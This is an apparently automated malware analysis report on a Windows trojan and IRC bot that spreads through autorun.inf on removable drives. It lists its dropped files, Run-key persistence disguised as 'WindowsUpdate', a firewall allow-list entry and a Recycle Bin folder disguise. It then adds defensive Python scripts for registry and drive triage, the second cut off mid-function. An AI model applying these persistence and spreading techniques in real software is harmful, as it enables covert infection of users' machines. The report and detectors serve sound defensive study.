Trojan.Win32.Agent.amobq (Kaspersky), Trojan.GenericKD.2067268 (B) (Emsisoft), Trojan.GenericKD.2067268 (AdAware), mzpefinder_pcap_file.YR, GenericAutorunWorm.YR, GenericInjector.YR, GenericIRCBot.YR, TrojanDropperVtimrun.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 34bede60c04552c0b0bcad13848048aa
SHA1: e9e2bbd8e7c287ff5656af24136721dde305c1e0
SHA256: 6c4e4620e2ca96f368cdcc0314fcb78c8efdefde4830828bccbe83456d2a1dc3
SSDeep: 3072:eoDuN20X5hzHfUSESmnl/4cOTPfQl/4cOTPfK:e3lLUSHtLTlLTK
Size: 135818 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-12-27 16:02:54
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
Process activity
The Trojan creates the following process(es):
Cyanide.exe:348
Cyanide.exe:1972
winsvc32.exe:344
Ganja145.exe:1436
NESbot.exe:612
NESbot.exe:1388
The Trojan injects its code into the following process(es) (msconfig.exe here is the copy dropped into the user's Application Data folder, see File activity below, not the Windows System Configuration utility):
msconfig.exe:1532
%original file name%.exe:772
hhh.exe:388
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process msconfig.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)
The process Cyanide.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)
The process %original file name%.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)
The process hhh.exe:388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)
The process Ganja145.exe:1436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)
The process NESbot.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\winsvc32.exe (601 bytes)
Registry activity
The process msconfig.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Ganja145.exe" = "Win32 Cabinet Self-Extractor"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CA 87 D0 FE C0 18 7D C5 D6 BC 2F 19 D9 8C A3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan sets three Local Intranet zone options (UNCAsIntranet, ProxyBypass and IntranetName). With all three at "1", network paths (UNC shares), sites that bypass the proxy server and local sites not assigned to another zone are placed in the Local Intranet zone. These are the Windows defaults for that zone, and several of the sample's processes write the same values, which is typical of WinINet/urlmon initialization (the bot imports URLDownloadToFileA) rather than deliberate tampering, so they are weak indicators on their own:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
"IntranetName" = "1"
Proxy use is disabled, so the bot connects directly:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To run automatically at each Windows start, the Trojan adds links to its file to the machine-wide and the per-user registry autorun keys. The value name "WindowsUpdate" and the file name msconfig.exe both imitate legitimate Windows components, but the file sits in the user's Application Data folder, where no genuine Windows binary lives:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
Adds an exception to the Windows Firewall standard profile that allows the dropped file unrestricted network activity (the bot builds such entries with the "%s:*:Enabled:%s" format string visible in its strings dump):
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Cyanide.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 1B 90 B5 0C ED 82 71 0B E0 4D 73 C4 0D B0 82"
The process Cyanide.exe:1972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 13 39 0B 6D 45 02 5D 03 13 7E 88 83 64 1B 48"
The process %original file name%.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA DE 2F 50 06 CA B9 13 BD 6A 53 5C 75 18 CD 88"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Cyanide.exe" = "Cyanide"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan sets the Local Intranet zone options UNCAsIntranet, IntranetName and ProxyBypass to "1" (network paths, local sites not assigned to another zone, and sites that bypass the proxy are all treated as Local Intranet). These are the Windows defaults and are typically written as a side effect of WinINet initialization rather than by deliberate tampering:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"IntranetName" = "1"
"ProxyBypass" = "1"
The process hhh.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 17 E2 02 8A 7D 3F D8 66 F6 5E 6A 36 C2 73 EA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"NESbot.exe" = "NESbot"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan sets the Local Intranet zone options UNCAsIntranet, IntranetName and ProxyBypass to "1" (network paths, local sites not assigned to another zone, and sites that bypass the proxy are all treated as Local Intranet). These are the Windows defaults and are typically written as a side effect of WinINet initialization rather than by deliberate tampering:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"IntranetName" = "1"
"ProxyBypass" = "1"
The process winsvc32.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B D8 6D 7E 7B AB A8 BE FD 12 70 E7 30 01 AC B9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process Ganja145.exe:1436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 04 94 A9 80 2D A8 DC 21 33 F5 F0 F4 AB 84 A3"
Ganja145.exe is a Win32 Cabinet Self-Extractor (WExtract; see its MUICache entry above and the wextract.pdb string in its dump). The RunOnce value it registers is the extractor's standard cleanup: at the next logon it calls DelNodeRunDLL32 in advpack.dll to delete the temporary extraction folder, after which Windows removes the value. It runs once and does not relaunch the Trojan, so it is not a persistence mechanism:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The process NESbot.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 58 BE 2D E9 FB 0D 86 63 DC A2 62 85 F0 08 23"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process NESbot.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E2 95 EC 3F 2E 23 17 7A 68 08 D3 4D 10 A5 64"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
To run automatically at each Windows start, the Trojan adds the following link to its file to the registry autorun key. The value holds a bare file name rather than a full path; it still resolves because the file was dropped into %WinDir%, which is on the default search path (this is also why the removal steps below must delete %WinDir%\winsvc32.exe and not only the value):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsvc32" = "winsvc32.exe"
Dropped PE files
MD5 | File path |
---|---|
d6152e2c63bb3e7d4b8f5abf9c76aecf | c:\Documents and Settings\"%CurrentUserName%"\Application Data\msconfig.exe |
d6152e2c63bb3e7d4b8f5abf9c76aecf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Cyanide.exe |
Both paths carry the same MD5, so Cyanide.exe (written to Temp by the original sample) and msconfig.exe (written to Application Data by Cyanide.exe and registered under the Run keys) are one and the same binary; the Temp copy is the staging copy and the Application Data copy is the persistent one.
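The autorun and firewall entries in the Registry activity section above are what an incident responder checks across a fleet. The Python script below is an added example, not part of the Lavasoft report and not the malware's code: it parses a .reg export and flags the three patterns this sample shows, namely a Run value whose target lives in a user-profile folder under a Windows-sounding name, a bare file name resolved through the search path, and a firewall allow-list entry (in the path:scope:Enabled:name layout that matches the bot's "%s:*:Enabled:%s" string) for a program under a user profile. The .reg text, the user name alice and the list of borrowed Windows binary names are constructed assumptions; the WExtract cleanup value is included to show that it is not flagged.

```python
"""Triage Run/RunOnce values and Windows Firewall allow-list entries from a
.reg export. Added example; not code from the Lavasoft report or the malware.
The export below is constructed (user name 'alice' is an assumption)."""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate"="C:\\Documents and Settings\\alice\\Application Data\\msconfig.exe"
"winsvc32"="winsvc32.exe"
"IgfxTray"="C:\\WINDOWS\\system32\\igfxtray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate"="C:\\Documents and Settings\\alice\\Application Data\\msconfig.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"="rundll32.exe C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32 C:\\DOCUME~1\\alice\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Documents and Settings\\alice\\Application Data\\msconfig.exe"="C:\\Documents and Settings\\alice\\Application Data\\msconfig.exe:*:Enabled:WindowsUpdate"
"C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger"
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')   # "name"="REG_SZ data"
USER_PROFILE_MARKERS = ("\\documents and settings\\", "\\users\\", "\\application data\\",
                        "\\appdata\\", "\\local settings\\", "\\temp\\")
# Assumption: names of Windows binaries this family borrows; extend for your environment.
WINDOWS_LOOKALIKES = {"msconfig.exe", "lsass.exe", "svchost.exe", "csrss.exe",
                      "winlogon.exe", "services.exe", "explorer.exe"}
HOST_LAUNCHERS = {"rundll32.exe", "regsvr32.exe"}   # judge their DLL argument, not the launcher


def unescape(s):
    # .reg escaping: a backslash protects the next character (backslash or quote)
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return (key, value name, string data) for every REG_SZ line in a .reg export."""
    key, entries = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line) if key else None
        if m:
            entries.append((key, unescape(m.group(1)), unescape(m.group(2))))
    return entries


def split_command(command):
    """Return (executable, arguments) for a Run-key command line."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end], command[end + 1:].strip()
    m = re.match(r"(.+?\.(?:exe|com|scr|bat|cmd))(?:\s+|$)", command, re.IGNORECASE)
    if m:
        return m.group(1), command[m.end():]
    head, _, rest = command.partition(" ")
    return head, rest


def in_user_profile(path):
    low = path.lower()
    return any(marker in low for marker in USER_PROFILE_MARKERS)


def triage_run_value(data):
    """Reasons an autorun command line deserves a look; empty list means nothing odd."""
    exe, args = split_command(data)
    base = exe.lower().rsplit("\\", 1)[-1]
    reasons = []
    if base in HOST_LAUNCHERS:
        dll = args.split(",", 1)[0].strip().strip('"')   # rundll32 <dll>,<entry> <args>
        if in_user_profile(dll):
            reasons.append("%s loads a DLL from a user-profile folder" % base)
        return reasons
    if "\\" not in exe:
        reasons.append("bare file name resolved through the search path")
    if in_user_profile(exe):
        reasons.append("autorun target lives under a user-profile folder")
    if base in WINDOWS_LOOKALIKES and "\\windows\\" not in exe.lower():
        reasons.append("Windows binary name outside %SystemRoot%")
    return reasons


def triage_firewall_value(data):
    """XP firewall list data is 'path:scope:Enabled|Disabled:display name'."""
    try:
        path, scope, state, display = data.rsplit(":", 3)
    except ValueError:
        return ["unparseable firewall entry"]
    if state.lower() == "enabled" and in_user_profile(path):
        return ["firewall exception for a user-profile program, scope %s, shown as '%s'" % (scope, display)]
    return []


def triage(reg_text):
    """Return (key, value name, reasons) for every autorun and firewall entry."""
    findings = []
    for key, name, data in parse_reg(reg_text):
        tail = key.rsplit("\\", 1)[-1].lower()
        if tail in ("run", "runonce"):
            findings.append((key, name, triage_run_value(data)))
        elif tail == "list" and "authorizedapplications" in key.lower():
            findings.append((key, name, triage_firewall_value(data)))
    return findings


def flagged_names(reg_text):
    return sorted({name for _, name, reasons in triage(reg_text) if reasons})


if __name__ == "__main__":
    for _key, name, reasons in triage(SAMPLE_REG):
        print("%-60s %s" % (name[:60], "; ".join(reasons) or "ok"))
```

Run it on a real export produced with `reg export` of the Run, RunOnce and AuthorizedApplications\List keys; the rundll32 rule only looks at the DLL being loaded, so the self-extractor's cleanup entry comes back clean while the two WindowsUpdate values and the bare winsvc32.exe are reported.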
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
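The propagation routine matches the strings in the dump below: the worm writes an autorun.inf next to its copy and a Desktop.ini carrying the Recycle Bin CLSID {645FF040-5081-101B-9F08-00AA002F954E}, so Explorer presents the folder that holds the executable as the Recycle Bin. The Python scanner that follows is an added example, not code from the report or from the malware. It builds a constructed sample drive layout in a temporary directory (the folder name RECYCLER and the file name usbBlock.exe are assumptions drawn from the strings) and reports both artifacts. Windows 7 and later no longer honour autorun.inf on removable drives, but the desktop.ini disguise still hides the payload folder.

```python
"""Scan a removable-drive root for the two artifacts this worm leaves behind:
an autorun.inf that launches an executable, and a folder whose desktop.ini
borrows the Recycle Bin CLSID so Explorer shows it as the Recycle Bin.
Added example, not part of the Lavasoft report or of the malware itself."""
import os
import re
import tempfile

# Recycle Bin shell-folder CLSID, as it appears in the bot's strings dump.
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"
# autorun.inf keys that make Explorer run something on drive open/double-click
LAUNCH_KEYS = ("open", "shellexecute")
SHELL_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd")


def read_text(path):
    """Read an INI-style file; desktop.ini/autorun.inf may be ANSI or UTF-16 with BOM."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def parse_ini(text):
    """Minimal INI parser: {section: {key: value}} with lower-cased names."""
    result, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            result.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            result[section][key.strip().lower()] = value.strip()
    return result


def autorun_targets(ini_path):
    """Commands an autorun.inf hands to Explorer (open=, shellexecute=, shell\\x\\command=)."""
    autorun = parse_ini(read_text(ini_path)).get("autorun", {})
    return [v for k, v in autorun.items() if k in LAUNCH_KEYS or SHELL_COMMAND_RE.match(k)]


def is_recycle_bin_disguise(ini_path):
    """True when desktop.ini assigns the Recycle Bin CLSID to its folder."""
    info = parse_ini(read_text(ini_path)).get(".shellclassinfo", {})
    return info.get("clsid", "").upper() == RECYCLE_BIN_CLSID


def scan_drive(root):
    """Walk a drive root; return (kind, path, detail) findings."""
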